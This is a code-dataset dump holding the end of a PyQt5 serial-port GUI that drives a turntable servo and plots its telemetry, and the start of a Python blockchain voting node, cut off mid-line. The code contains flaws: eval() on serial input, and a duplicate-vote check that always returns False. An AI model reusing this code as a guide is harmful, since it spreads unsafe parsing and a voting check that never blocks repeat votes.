self.plotWidget1.plot(self.data7, pen=\"r\", name=\"mode7\")\n self.curve8 = self.plotWidget2.plot(self.data8, pen=\"w\", name=\"mode8\")\n self.curve9 = self.plotWidget2.plot(self.data9, pen=\"g\", name=\"mode9\")\n self.curve10 = self.plotWidget2.plot(self.data10, pen=\"r\", name=\"mode10\")\n\n self.ptr1 = 0\n self.ptr2 = 0\n self.ptr3 = 0\n self.ptr4 = 0\n self.ptr5 = 0\n self.ptr6 = 0\n self.ptr7 = 0\n self.ptr8 = 0\n self.ptr9 = 0\n self.ptr10 = 0\n\n # # 设定定时器\n # self.timer = pq.QtCore.QTimer()\n # # 定时器信号绑定 update_data 函数\n # self.timer.timeout.connect(self.update_data)\n\n # # 定时器间隔50ms,可以理解为 50ms 刷新一次数据\n # self.timer.start(50)\n\n # 数据左移\n # def update_data(self):\n # data_received = self.data_receive()\n # print('cccccccccccccccccccccccc')\n # print(data_received)\n # # while data_received != [0,0,0,0]:\n # # 线1\n # self.data1[:-1] = self.data1[1:]\n #\n # self.data1[-1] = np.random.normal()\n # self.data1[-1] = data_received[0]\n # print('bbbbbbbbbbbbbbbbbbbbbbbbbbb')\n # print(self.data1)\n # # 数据填充到绘制曲线中\n # self.curve1.setData(self.data1)\n # # x 轴记录点\n # self.ptr1 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve1.setPos(self.ptr1, 0)\n #\n # # 线2\n # self.data2[:-1] = self.data2[1:]\n # # self.data2[-1] = np.random.normal()\n # self.data2[-1] = data_received[1]\n # # 数据填充到绘制曲线中\n # self.curve2.setData(self.data2)\n # # x 轴记录点\n # self.ptr2 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve2.setPos(self.ptr2, 0)\n #\n # # 线3\n # self.data3[:-1] = self.data3[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data3[-1] = data_received[2]\n # # 数据填充到绘制曲线中\n # self.curve3.setData(self.data3)\n # # x 轴记录点\n # self.ptr3 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve3.setPos(self.ptr3, 0)\n #\n # # 线4\n # self.data4[:-1] = self.data4[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data4[-1] = data_received[3]\n # # 数据填充到绘制曲线中\n # self.curve4.setData(self.data4)\n # # x 轴记录点\n # self.ptr4 += 1\n # # 重新设定 x 相关的坐标原点\n # self.curve4.setPos(self.ptr4, 0)\n\n\n\n # 刷新一下串口\n def refresh(self):\n # 查询可用的串口\n plist = list(serial.tools.list_ports.comports())\n\n if len(plist) <= 0:\n print(\"No used com!\")\n # self.statusBar.showMessage('没有可用的串口')\n\n else:\n # 把所有的可用的串口输出到comboBox中去\n self.cmb_port_name.clear()\n\n for i in range(0, len(plist)):\n plist_0 = list(plist[i])\n self.cmb_port_name.addItem(str(plist_0[0]))\n\n # 打开串口\n def port_open(self):\n self.ser.port = self.cmb_port_name.currentText()\n self.ser.baudrate = 460800\n self.ser.bytesize = 8\n self.ser.stopbits = 1\n try:\n self.ser.open()\n except:\n QMessageBox.critical(self, \"Port Error\", \"此串口不能被打开!\")\n return None\n\n # 打开串口接收定时器,周期为2ms\n self.timer.start(20)\n\n if self.ser.isOpen():\n self.btn_open.setEnabled(False)\n self.btn_close.setEnabled(True)\n\n # 关闭串口\n def port_close(self):\n try:\n self.ser.close()\n except:\n pass\n self.btn_open.setEnabled(True)\n self.btn_close.setEnabled(False)\n\n # 显示滑动条数据\n def valueChange_slider(self):\n value = self.verticalSlider.value()\n self.data_edit2.setText(str(value))\n\n # 显示圆盘数据\n def valueChange_dial(self):\n # self.dial.setRange(-100, 100) # 设置范围\n # self.dial.setWrapping(False) # 刻度不留缺口\n value = self.dial.value()\n self.data_edit1.setText(str(value))\n\n # def init_data_edit(self):\n # self.data_edit1.setText('0.00')\n # self.data_edit2.setText('0.00')\n\n # 发送数据\n def data_send(self):\n if self.ser.isOpen():\n if self.active_button == '速度运行模式':\n\n input_speed_initial1 = round(float(self.data_edit1.text()) * 100)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 100)\n\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '03')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n elif self.active_button == '位置运行模式':\n input_speed_initial1 = round(float(self.data_edit1.text()) * 65536 / 360)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 65536 / 360)\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '0C')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n elif self.active_button == '稳定运行模式':\n input_speed_initial1 = round(float(self.data_edit1.text()) * 100)\n input_speed_initial2 = round(float(self.data_edit2.text()) * 100)\n hex_command1, input_speed_form = function_file.data_send_function(input_speed_initial1, input_speed_initial2,\n '60')\n self.ser.write(hex_command1)\n self.show_send.append(input_speed_form)\n\n #接收数据\n def data_receive(self):\n # data1 = []\n # nn = []\n data_s = [0,0,0,0]\n try:\n count = self.ser.inWaiting()\n except:\n self.port_close()\n return data_s\n if count != 0:\n dealStr = ''\n # 读串口数据\n recv = self.ser.read(count)\n print(recv[:1])\n # 在这里将接收到数据进行区分:hex 或 字符串\n # hex 格式:\\xYY\\xYY\\xYY,如果接收到的字符是这种格式,则说明是hex字符,我们需要将\n # \\x去除掉,取出YY,然后组成字符串返回\n # 如果接收到的是字符串,则使用decode进行解码\n print(\"接收到的数据 %s \\n类型为: %s\\n\" % (recv, type(recv)))\n # print(dealStr[12:16])\n # print(type(dealStr[12:16]))\n\n try:\n dealStr = recv.decode()\n except (TypeError, UnicodeDecodeError):\n for i in range(len(recv)):\n # print(recv[i])\n dealStr += hex(recv[i])[2:].zfill(2)\n # print(dealStr)\n dealStr += ' '\n print(\"处理后的数据 %s \\n类型为: %s\\n\" % (dealStr, type(dealStr)))\n print(dealStr[3:5])\n print(dealStr[6:8])\n print(dealStr[9:11])\n print(dealStr[12:14])\n # print(len(dealStr))\n # print(type(len(dealStr)))\n # print(dealStr[:5])\n # print(dealStr[len(dealStr)-3:])\n # dd = dealStr[len(dealStr)-3:len(dealStr)-1]\n # print('12345678900')\n # print(dd)\n # print(type(dd))\n print('1333333333333333333333')\n print(dealStr[59:61])\n # 校验位\n lit1 = [\n eval('0x' + dealStr[6:8]),\n eval('0x' + dealStr[9:11]),\n eval('0x' + dealStr[12:14]),\n eval('0x' + dealStr[15:17]),\n eval('0x' + dealStr[18:20]),\n eval('0x' + dealStr[21:23]),\n eval('0x' + dealStr[24:26]),\n eval('0x' + dealStr[27:29]),\n eval('0x' + dealStr[30:32]),\n eval('0x' + dealStr[33:35]),\n eval('0x' + dealStr[36:38]),\n eval('0x' + dealStr[39:41]),\n eval('0x' + dealStr[42:44]),\n eval('0x' + dealStr[45:47]),\n eval('0x' + dealStr[48:50]),\n eval('0x' + dealStr[51:53]),\n eval('0x' + dealStr[54:56]),\n eval('0x' + dealStr[57:59]),\n eval('0x' + dealStr[60:62]),\n eval('0x' + dealStr[63:65]),\n eval('0x' + dealStr[66:68]),\n eval('0x' + dealStr[69:71]),\n eval('0x' + dealStr[72:74]),\n eval('0x' + dealStr[75:77]),\n eval('0x' + dealStr[78:80]),\n eval('0x' + dealStr[81:83]),\n eval('0x' + dealStr[84:86]),\n eval('0x' + dealStr[87:89]),\n eval('0x' + dealStr[90:92]),\n eval('0x' + dealStr[93:95])]\n\n t_12 = None\n for i in range(len(lit1)):\n if i:\n t_12 ^= lit1[i]\n else:\n t_12 = lit1[i] ^ 0\n print('17777777777777777777777777777777777777')\n print(dealStr[len(dealStr) - 39:len(dealStr) - 37])\n print(dealStr[len(dealStr) - 42:len(dealStr) - 40])\n print(len(dealStr))\n # print(dealStr[len(dealStr)-6:len(dealStr)-4])\n print(hex(t_12))\n\n # if dealStr[:5] == '55 aa' and dealStr[len(dealStr)-3:len(dealStr)-1] == 'f0' and len(dealStr) == 66 and hex(t_12)[2:].zfill(2) == dealStr[len(dealStr)-6:len(dealStr)-4]:\n if dealStr[:5] == '55 aa' and dealStr[len(dealStr)-3:len(dealStr)-1] == 'f0' and len(dealStr) == 102 and hex(t_12)[2:].zfill(2) == dealStr[len(dealStr)-6:len(dealStr)-4]:\n dealStr_new = dealStr.replace(' ', '') #去除首尾空格\n print(dealStr_new)\n print(type(dealStr_new))\n recv1 = str(dealStr_new[8:10]) # 当前运行模式\n print(recv1)\n if recv1 == '03':\n self.lineEdit_1.setText('速度运行模式')\n elif recv1 == '0c':\n self.lineEdit_1.setText('位置运行模式')\n elif recv1 == '10':\n self.lineEdit_1.setText('锁定')\n elif recv1 == '60':\n self.lineEdit_1.setText('稳定运行模式')\n elif recv1 == '80':\n self.lineEdit_1.setText('功放上电')\n elif recv1 == '00':\n self.lineEdit_1.setText('功放断电')\n else:\n pass\n recv2 = str(dealStr_new[10:12]) # 转台到位状态\n print(recv2)\n if recv2 == '01':\n self.lineEdit_2.setText('俯仰到位, 方位未到位')\n elif recv2 == '10':\n self.lineEdit_2.setText('俯仰未到位, 方位到位')\n elif recv2 == '11':\n self.lineEdit_2.setText('俯仰、方位均到位')\n elif recv2 == '00':\n self.lineEdit_2.setText('俯仰、方位均未到位')\n print('11111111111111111111111')\n else:\n pass\n\n\n recv3 = '0x' + str(dealStr_new[12:20]) #方位角速度\n recv3_er_new = function_file.data_receive_process(recv3, 32, 14800)\n r_3 = '%.04f' % (round(recv3_er_new, 4))\n self.lineEdit_3.setText(str(r_3))\n\n recv4 = '0x' + str(dealStr_new[20:28]) #俯仰角速度\n recv4_er_new = function_file.data_receive_process(recv4, 32, 14800)\n r_4 = '%.04f'%(round(recv4_er_new, 4))\n self.lineEdit_4.setText(str(r_4))\n\n recv5 = '0x' + str(dealStr_new[28:34]) #方位角度\n recv5_er_new = function_file.data_receive_process(recv5, 24, 1000)\n r_5 = '%.04f'%(round(recv5_er_new, 4))\n self.lineEdit_5.setText(str(r_5))\n\n recv6 = '0x' + str(dealStr_new[34:40]) # 俯仰角度\n recv6_er_new = function_file.data_receive_process(recv6, 24, 1000)\n r_6 = '%.04f'%(round(recv6_er_new, 4))\n self.lineEdit_6.setText(str(r_6))\n###########################################################\n recv7 = '0x' + str(dealStr_new[40:44]) # 俯仰角度\n recv7_er_new = function_file.data_receive_process(recv7, 16, 1241)\n r_7 = '%.04f' % (round(recv7_er_new, 4))\n\n recv8 = '0x' + str(dealStr_new[44:48]) # 俯仰角度\n recv8_er_new = function_file.data_receive_process(recv8, 16, 1241)\n r_8 = '%.04f' % (round(recv8_er_new, 4))\n\n recv9 = '0x' + str(dealStr_new[48:52]) # 俯仰角度\n recv9_er_new = function_file.data_receive_process(recv9, 16, 1241)\n r_9 = '%.04f' % (round(recv9_er_new, 4))\n##############################################################\n recv10 = '0x' + str(dealStr_new[52:56]) # 俯仰角度\n recv10_er_new = function_file.data_receive_process(recv10, 16, 1241)\n r_10 = '%.04f' % (round(recv10_er_new, 4))\n\n recv11 = '0x' + str(dealStr_new[56:60]) # 俯仰角度\n recv11_er_new = function_file.data_receive_process(recv11, 16, 1241)\n r_11 = '%.04f' % (round(recv11_er_new, 4))\n\n recv12 = '0x' + str(dealStr_new[60:64]) # 俯仰角度\n recv12_er_new = function_file.data_receive_process(recv12, 16, 1241)\n r_12 = '%.04f' % (round(recv12_er_new, 4))\n # self.lineEdit_6.setText(str(r_6))\n # data_s[0] = r_3\n # data_s[1] = r_4\n # data_s[2] = r_5\n # data_s[3] = r_6\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # print(data_s)\n ## data1\n self.data1[:-1] = self.data1[1:]\n self.data1[-1] = r_3\n\n # 数据填充到绘制曲线中\n self.curve1.setData(self.data1)\n # x 轴记录点\n self.ptr1 += 1\n # 重新设定 x 相关的坐标原点\n\n self.curve1.setPos(self.ptr1, 0)\n # return data_s\n\n # 线2\n self.data2[:-1] = self.data2[1:]\n # self.data2[-1] = np.random.normal()\n self.data2[-1] = r_4\n # 数据填充到绘制曲线中\n self.curve2.setData(self.data2)\n # x 轴记录点\n self.ptr2 += 1\n # 重新设定 x 相关的坐标原点\n self.curve2.setPos(self.ptr2, 0)\n\n # 线3\n self.data3[:-1] = self.data3[1:]\n # self.data1[-1] = np.random.normal()\n self.data3[-1] = r_5\n # 数据填充到绘制曲线中\n self.curve3.setData(self.data3)\n # x 轴记录点\n self.ptr3 += 1\n # 重新设定 x 相关的坐标原点\n self.curve3.setPos(self.ptr3, 0)\n\n # 线4\n self.data4[:-1] = self.data4[1:]\n # self.data1[-1] = np.random.normal()\n self.data4[-1] = r_6\n # 数据填充到绘制曲线中\n self.curve4.setData(self.data4)\n # x 轴记录点\n self.ptr4 += 1\n # 重新设定 x 相关的坐标原点\n self.curve4.setPos(self.ptr4, 0)\n\n # self.plotWidget1.plot(self.data1, name=\"mode2\")\n # self.plotWidget1.setPos(self.ptr4, 0)\n # self.graphicsView_1.plot(self.data3, name=\"mode3\")\n\n # self.curve5.setData(self.data1)\n # self.curve5.setPos(self.ptr4, 0)\n # self.curve5.setData(self.data3)\n self.data5[:-1] = self.data5[1:]\n self.data5[-1] = r_7\n self.data6[:-1] = self.data6[1:]\n self.data6[-1] = r_8\n self.data7[:-1] = self.data7[1:]\n self.data7[-1] = r_9\n self.curve5.setData(self.data5)\n self.curve6.setData(self.data6)\n self.curve7.setData(self.data7)\n self.ptr5 += 1\n self.curve5.setPos(self.ptr5, 0)\n self.ptr6 += 1\n self.curve6.setPos(self.ptr6, 0)\n self.ptr7 += 1\n self.curve7.setPos(self.ptr7, 0)\n # self.curve5.setData(self.data6)\n # self.curve5.setData(self.data3, name=\"mode7\")\n\n self.data8[:-1] = self.data8[1:]\n self.data8[-1] = r_10\n self.data9[:-1] = self.data9[1:]\n self.data9[-1] = r_11\n self.data10[:-1] = self.data10[1:]\n self.data10[-1] = r_12\n self.curve8.setData(self.data8)\n self.curve9.setData(self.data9)\n self.curve10.setData(self.data10)\n self.ptr8 += 1\n self.curve8.setPos(self.ptr8, 0)\n self.ptr9 += 1\n self.curve9.setPos(self.ptr9, 0)\n self.ptr10 += 1\n self.curve10.setPos(self.ptr10, 0)\n # self.data6[:-1] = self.data6[1:]\n # # self.data1[-1] = np.random.normal()\n # self.data6[-1] = r_8\n # self.curve5.setData(self.data6)\n # # self.curve5.setData(self.data3, name=\"mode7\")\n\n\n\n else:\n pass\n else:\n pass\n\n\n # nn.append('%.04f' % (round(recv3_er_new, 4)))\n # nn.append('%.04f' % (round(recv4_er_new, 4)))\n # nn.append('%.04f' % (round(recv5_er_new, 4)))\n # nn.append('%.04f' % (round(recv6_er_new, 4)))\n # data1 = np.array(nn)\n # print('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')\n # print(data1)\n # print(type(data1))\n\n # self.c = self.plotWidget_ted_1.plot(data1, name=\"mode2\")\n # # self.ptr1 = 0\n # self.timer.timeout.connect(self.update_data)\n # # # 定时器间隔50ms,可以理解为 50ms 刷新一次数据\n # self.timer.start(50)\n\n # ''' 功放、锁定、伺服选定时直接发送的数据 '''\n # def str_data_send(self):\n # if self.active_button == '功放上电':\n # hex_command = bytes.fromhex(self.POWER_ON)\n # self.ser.write(hex_command)\n # self.show_send.append(self.POWER_ON)\n # elif self.active_button == '功放断电':\n # hex_command = bytes.fromhex(self.POWER_OFF)\n # self.ser.write(hex_command)\n # self.show_send.append(self.POWER_OFF)\n # elif self.active_button == '锁定':\n # hex_command = bytes.fromhex(self.LOCK)\n # self.ser.write(hex_command)\n # self.show_send.append(self.LOCK)\n # elif self.active_button == '取数指令':\n # hex_command = bytes.fromhex(self.READ_DATA)\n # self.ser.write(hex_command)\n # self.show_send.append(self.READ_DATA)\n\n # 位置模式和速度模式按钮动作\n def button_active(self):\n radiobutton = self.sender()\n if radiobutton.text() == '速度运行模式' or radiobutton.text() == '稳定运行模式' or radiobutton.text() == '位置运行模式':\n self.active_button = radiobutton.text()\n self.data_edit1.setText('0.00')\n self.data_edit2.setText('0.00')\n self.data_edit1.setEnabled(True)\n self.data_edit2.setEnabled(True)\n if radiobutton.isChecked() == True:\n print('<' + radiobutton.text() + '>被选中')\n # 发送数据按钮\n print('<' + radiobutton.text() + '>下的数据:')\n self.btn_send.disconnect()\n self.btn_send.clicked.connect(self.data_send)\n else:\n pass\n if radiobutton.text() == '速度运行模式' or radiobutton.text() == '稳定运行模式':\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n # 设置当前值\n self.dial.setValue(0)\n self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(-100, 100) # 设置范围\n self.dial.setWrapping(False) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-100)\n # 设置最大值\n self.verticalSlider.setMaximum(100)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n elif radiobutton.text() == '位置运行模式':\n # Dial表盘\n self.dial.setNotchesVisible(True) # 设置刻度\n self.dial.setPageStep(0.01) # 翻页步长\n # self.dial.setNotchTarget(0.01)\n # 设置当前值\n self.dial.setValue(0)\n self.dial.setNotchTarget(5) # 设置刻度密度,即单位刻度所代表的大小\n self.dial.setRange(0, 360) # 设置范围\n self.dial.setWrapping(True) # 刻度不留缺口\n\n # slider垂直滑动条\n # 设置最小值\n self.verticalSlider.setMinimum(-10)\n # 设置最大值\n self.verticalSlider.setMaximum(90)\n # 设置步长\n self.verticalSlider.setSingleStep(0.01)\n # 设置当前值\n self.verticalSlider.setValue(0)\n # 设置在垂直滑块左侧绘制刻度线\n self.verticalSlider.setTickPosition(QSlider.TicksLeft)\n # 设置刻度间隔\n self.verticalSlider.setTickInterval(0.01)\n\n # 功放、伺服关闭、断电按钮动作\n def button_active_else(self):\n button_txt = self.sender()\n # if button_txt.text() == '功放上电' or button_txt.text() == '功放断电' or button_txt.text() == '锁定':\n # self.active_button = button_txt.text()\n # self.data_edit1.setEnabled(False)\n # self.data_edit2.setEnabled(False)\n if button_txt.text() == '功放上电':\n self.data_edit1.clear()\n self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.POWER_ON)\n self.ser.write(hex_command)\n self.show_send.append(self.POWER_ON)\n # self.pushButton_on.clicked.connect(self.str_data_send)\n elif button_txt.text() == '功放断电':\n self.data_edit1.clear()\n self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.POWER_OFF)\n self.ser.write(hex_command)\n self.show_send.append(self.POWER_OFF)\n # self.pushButton_off.clicked.connect(self.str_data_send)\n elif button_txt.text() == '锁定':\n self.data_edit1.clear()\n self.data_edit2.clear()\n self.data_edit1.setEnabled(False)\n self.data_edit2.setEnabled(False)\n print('<' + button_txt.text() + '>被选中')\n # 发送数据按钮\n print('<' + button_txt.text() + '>下的数据:')\n # self.btn_send.disconnect()\n hex_command = bytes.fromhex(self.LOCK)\n self.ser.write(hex_command)\n self.show_send.append(self.LOCK)\n # self.pushButton_lock.clicked.connect(self.str_data_send)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myshow = Pyqt5Serial()\n myshow.showMaximized() #窗口最大化显示\n sys.exit(app.exec_())\n\n# if __name__ == '__main__':\n# app = QApplication(sys.argv)\n# mainWindow = QMainWindow()\n# ui = Pro.Ui_MainWindow()\n# ui.setupUi(mainWindow)\n# mainWindow.show()\n# sys.exit(app.exec_())\n\n\n# def button_state(self):\n# radiobutton = self.sender()\n# if radiobutton.text() =='速度运行模式':\n# if radiobutton.isChecked() == True:\n# print('<' + radiobutton.text() + '>被选中')\n# # 发送数据按钮\n# print('等待发送速度运行模式下的数据:' )\n# self.btn_send.clicked.connect(self.data_send)\n# else:\n# print('<' + radiobutton.text() + '>取消选中')\n# if radiobutton.text() == '位置运行模式':\n# if radiobutton.isChecked() == True:\n# print('<' + radiobutton.text() + '>被选中')\n# print('等待发送位置运行模式下的数据:')\n# self.btn_send.clicked.connect(self.data_send)\n# else:\n# print('<' + radiobutton.text() + '>取消选中')\n\n\n# print(-int(recv3_er[1:],2))\n# recv3_er_new = reverse(recv3_er[1:])\n# recv3_er_add = add_1(recv3_er_new)\n#\n# self.lineEdit_3.setText(str(round(-int(recv3_er_add[1:],2)/14800, 2)))\n# bin(int('0x11', 16)) 十六进制数转二进制数 输出字符串类型\n# print(-int(recv3_er_add[1:],2))\n# print('1111111111111111111111')\n","sub_path":"testPro.py","file_name":"testPro.py","file_ext":"py","file_size_in_byte":33640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163674515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport Crypto\nimport Crypto.Random\nfrom Crypto.Hash import SHA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nimport hashlib as hasher\nimport binascii\nfrom collections import OrderedDict\nfrom random import randint\nimport time\nfrom tqdm import *\nimport os\nimport sys\nimport subprocess as sp\nimport getpass\nimport pyperclip\n\nimport ast # string representation of a dict to dict\n\nimport traceback # Para errores\n\n# Creación del archivo pending asociado al nodo\nid_nodo=int(sys.argv[1])\nname_pending = 'pending_' + str(id_nodo) + '.dat'\nfpending = open(name_pending, 'w').close()\n\n# Variables\nindex=0\nnew_voto = 0\naux_contador = 0\nt_pending = 0.2\n\naux = sp.call('clear',shell=True) # Limpiamos la shell\n\ndef print_aux():\n\t\"\"\"\n\t\tFunción auxiliar para mostrar separadores por consola.\n\t\"\"\"\n\n\tprint(50*\"=\")\n\ndef print_aux2():\n\t\"\"\"\n\t\tFunción auxiliar para mostrar separadores por consola.\n\t\"\"\"\n\n\tprint(50*\"-\")\n\ndef espera(secs):\n\t\"\"\"\n\t\tFunción auxiliar para mostrar barra de espera por consola.\n\t\"\"\"\n\n\tprint_aux2()\n\tfor i in tqdm(range(secs)):\n\t\ttime.sleep(1)\n\nclass Block:\n\t\"\"\"\n\t\tClase de los bloques que conforman la cadena de bloques (Blockchain).\n\t\"\"\"\n\n\tdef __init__(self, index, timestamp, transaction, node, previous_hash):\n\t\tself.index = index\n\t\tself.timestamp = timestamp\n\t\tself.transaction = transaction\n\t\tself.node = node\n\t\tself.previous_hash = previous_hash\n\t\tself.hash = self.hash_block()\n\n\tdef hash_block(self):\n\t\t# Crea el hash SHA256 del bloque\n\t\taux = (str(self.index) + str(self.timestamp) + str(self.transaction) + str(self.node) + str(self.previous_hash))\n\t\tblock_string = aux.encode()\n\t\treturn hasher.sha256(block_string).hexdigest()\n\nclass Transaction:\n\t\"\"\"\n\t\tClase de las transacciones.\n\t\"\"\"\n\n\tdef __init__(self, sender_address, recipient_address, value):\n\t\tself.sender_address = sender_address\n\t\tself.recipient_address = recipient_address\n\t\tself.value = value\n\n\tdef __getattr__(self, attr):\n \treturn self.data[attr]\n\n\tdef to_dict(self):\n\t\treturn ({'sender_address': str(self.sender_address),\n 'recipient_address': str(self.recipient_address),\n 'value': str(self.value)})\n\nclass Signature:\n\t\"\"\"\n\t\tClase de la Firma.\n\t\"\"\"\n\n\tdef __init__(self, sender_private_key, transaction):\n\t\tself.sender_private_key = sender_private_key\n\t\tself.transaction = transaction.to_dict()\n\n\tdef __getattr__(self, attr):\n \treturn self.data[attr]\n\n\tdef sign_transaction(self):\n\t\t# Firma transacción con la clave privada\n\t\tprivate_key = RSA.importKey(binascii.unhexlify(self.sender_private_key))\n\t\tsigner = PKCS1_v1_5.new(private_key)\n\t\th = SHA.new(str(self.transaction).encode('utf8'))\n\t\treturn binascii.hexlify(signer.sign(h)).decode('ascii')\n\ndef verify_transaction_signature(sender_address, signature, transaction):\n\t\"\"\"\n\t\tVerifica que la Firma se corresponde con una transacción firmada\n\t\tcon la clave pública del emisor.\n\t\"\"\"\n\n\tthis_public_key = RSA.importKey(binascii.unhexlify(sender_address))\n\tthis_verifier = PKCS1_v1_5.new(this_public_key)\n\tthis_h = SHA.new(str(transaction).encode('utf8'))\n\n\treturn this_verifier.verify(this_h, binascii.unhexlify(signature))\n\ndef add_block(blockchain,block):\n\t\"\"\"\n\t\tAñade un bloque al fichero blockchain.dat y a la variable local \"blockchain\".\n\t\"\"\"\n\n\tblockchain.append(block)\t\n\tfblockchain = open(\"blockchain.dat\",\"a\")\n\tfblockchain.write(block.index + \"|\" + block.timestamp + \"|\" + block.transaction['sender_address'] + \",\" + block.transaction['recipient_address'] + \",\" + str(block.transaction['value']) + \"|\" + str(block.node) + \"|\" + block.previous_hash + \"|\" + block.hash + '\\n')\n\tfblockchain.close()\n\ndef check_votante(blockchain,votante):\n\t\"\"\"\n\t\tComprueba si un votante se encuentra en Blockchain.\n\t\"\"\"\n\n\tfor i in range(0, len(blockchain)):\n\t\t# Check votante\n\t\tif votante == blockchain[i].transaction['sender_address'].strip():\n\t\t\tTrue\n\t\t\tbreak\n\t\t\n\treturn False\n\n# Leemos la lista de Candidatos\nfcandidatos = open('candidatos.dat','r')\naux_str = fcandidatos.readlines()\ncandidatos = map(str.strip, aux_str)\nfcandidatos.close()\n\nvotos_candidatos=[0] * len(candidatos) # Para conteo de candidatos\n\n# Limpiamos blockchain\n#fblockchain = open(\"blockchain.dat\",\"w\").close()\nblockchain=[]\n\n# Si no hay genesis block, lo añadiomos\nfblockchain = open('blockchain.dat', 'r')\naux_str = fblockchain.readlines()\nblockchain_file = map(str.strip, aux_str)\nfblockchain.close()\n\nif len(blockchain_file) == 0:\n\tgen_block = Block(\"0\",time.strftime(\"%d/%m/%Y %H:%M:%S\"),Transaction(\"Genesis block\",\"-\",\"1\").to_dict(),\"0\",\"0\")\n\tadd_block(blockchain,gen_block)\n\nloop = True\nwhile loop:\n\ttry:\n\t\t# Detectamos cuando se añade algo al archivo pending (se comprueba que el archivo pending no está vacío)\n\t\tif not(os.stat(name_pending).st_size == 0):\t\t\n\n\t\t\t# Leemos pending (se lee así para quitar el \\n todas las lineas)\n\t\t\twith open(name_pending) as f:\n\t\t\t\tpending = f.readlines()\n\t\t\t\tpending = [x.strip() for x in pending]\n\n\t\t\tnext_vote = pending[0]\n\n\t\t\t# Cogemos el voto nuevo\n\t\t\tvote_time,pub_key_1,aux_t1,s1=next_vote.split(\"|\")\n\t\t\tt1 = ast.literal_eval(aux_t1)\n\t\t\tnew_voto = 1\n\n\t\t\twhile new_voto == 1:\n\t\t\t\taux = sp.call('clear',shell=True)\n\t\t\t\tprint_aux()\n\t\t\t\tprint(\"[!] Se ha encontrado una transacción pendiente\")\n\t\t\t\tprint_aux2()\n\t\t\t\tprint(\"[+] Fecha: \" + str(vote_time))\n\t\t\t\tprint(\"\\n- Sender: \" + str(t1['sender_address'][:30]) + \"...\")\n\t\t\t\tprint(\"\\n- Receiver: \" + str(t1['recipient_address'][:30]) + \"...\")\n\n\t\t\t\t# Verificación de transacción\n\t\t\t\tverification = verify_transaction_signature(pub_key_1,s1,t1)\n\t\t\t\tprint(\"\\n- Verificación de transacción: \" + str(verification))\n\n\t\t\t\t# Evitar voto duplicado\n\t\t\t\tvoto_duplicado = check_votante(blockchain,t1['sender_address'])\n\t\t\t\tprint(\"\\n- ¿El votante ha votado ya?: \" + str(voto_duplicado))\n\t\t\t\tprint_aux2()\n\t\t\t\t\n\t\t\t\tif verification:\n\t\t\t\t\tfflag = open('flag.dat', 'r')\n\t\t\t\t\taux_flag = fflag.readlines()\n\t\t\t\t\tflag = map(str.strip, aux_flag)\n\t\t\t\t\tfflag.close()\n\n\t\t\t\t\t# Si Blockchain no está siendo usado por otro nodo\n\t\t\t\t\tif len(flag) == 1:\n\t\t\t\t\t\tif flag[0] == '0':\n\t\t\t\t\t\t\t# Bloqueo del fichero blockchain.dat\n\t\t\t\t\t\t\tfflag = open('flag.dat', 'w')\n\t\t\t\t\t\t\tfflag.write(\"1\")\n\t\t\t\t\t\t\tfflag.close()\n\n\t\t\t\t\t\t\t# Leemos blockchain.dat\n\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 'r')\n\t\t\t\t\t\t\taux_str = fblockchain.readlines()\n\t\t\t\t\t\t\tblockchain_file = map(str.strip, aux_str)\n\t\t\t\t\t\t\tfblockchain.close()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tfblockchain = open('blockchain.dat', 'w').close()\n\t\t\t\t\t\t\tblockchain=[]\n\n\t\t\t\t\t\t\t# Lo copiamos en blockchain local (Actualizamos blockchain local)\n\t\t\t\t\t\t\tif len(blockchain_file) != 0:\n\t\t\t\t\t\t\t\tfor i in range(0, len(blockchain_file)):\n\t\t\t\t\t\t\t\t\taux_index,aux_timestamp,aux_aux_transaction,aux_node,aux_prev_hash,aux_actual_hash=blockchain_file[i].split(\"|\")\n\t\t\t\t\t\t\t\t\taux_transaction=(aux_aux_transaction.split(\",\"))\n\n\t\t\t\t\t\t\t\t\taux_block = 